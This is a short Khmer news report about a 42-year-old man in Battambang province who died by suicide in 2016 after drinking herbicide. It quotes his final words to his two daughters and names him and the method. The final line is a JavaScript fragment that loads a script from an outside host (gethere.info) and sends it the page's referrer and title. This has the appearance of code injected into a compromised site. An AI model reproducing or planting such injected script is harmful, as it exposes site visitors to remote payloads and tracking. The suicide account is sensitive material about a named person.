បណ្តាំចុងក្រោយ! ប៉ាស្លាប់យកប៉ាទៅកប់នៅក្រោយផ្ទះ ប៉ានិងបានមើលកូនលេងនៅទីនោះ
ខេត្តបាត់ដំបង៖ នេះជាពាក្យបណ្តាំចុងក្រោយមុនជនរងគ្រោះសំរេចចិត្តធ្វើអត្តឃាតផឹកថ្នាំបាញ់ស្មៅសម្លាប់ខ្លួនឯង ប៉ាស្លាប់យកប៉ាទៅកប់នៅកន្លែងដើមថ្នាំតាក្រោយផ្ទះ ប៉ានិងបានមើលកូនលេងក្រោយផ្ទះ កូនស្រីទាំងពីររបស់ប៉ា ប៉ាស្រឡាញ់កូនណាស់ ប៉ាស្លាប់ទៅព្រលឹងនៅតែអាល័យ នឹងកូនអាល័យម៉ែ អស់កូន ប៉ាមិនចង់ស្លាប់ទេណាកូន។
គួររំលឹកដែរថានៅថ្ងៃទី០៦.០៩.២០១៦ វេលាម៉ោង០៩.៣០នាទីក្រុម០២ស្ថិត នៅក្នុងភូមិដំណាក់អំពិល ឃុំបារាំងធ្លាក់ ស្រុកភ្នំព្រឹក ខេត្តបាត់ដំបងមានករណីធ្វើអត្តឃាតដោយផឹកថ្នាំបាញ់ស្មៅ(អាឆេះ) បណ្តាលឲ្យស្លាប់០១នាក់ ជនរងគ្រោះឈ្មោះ យឿន យ៉េត ភេទប្រុសអាយុ ៤២ឆ្នាំ រងរបួសធ្ងន់ ត្រូវបានក្រុមគ្រួសារ បញ្ជូនទៅជួយសង្រ្គោះនៅ មន្ទីពេទ្យខ្លងហាត (ប្រទេសថៃ) តែខាងមន្ទីពេទ្យថៃ ថាអស់សង្ឃឹមហើយក៏បានបញ្ជូនមកវិញ ខាងក្រុមគ្រួសារមិនអស់ចិត្តក៏បញ្ជូនទៅព្យាបាលនៅមន្ទីពេទ្យបង្អែកខេត្តបាត់ដំបងបន្តទៀត មកដល់ថ្ងៃទី០៧.០៩.២០១៦ វេលាម៉ោង២ និង៣៥នាទី រលងអាធ្រាត ជនរងគ្រោះបានស្លាប់ មូលហេតុៈ ជនរងគ្រោះ មានជម្ងឺប្រចាំកាយ(ទឹកនោមផ្អែម)។
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;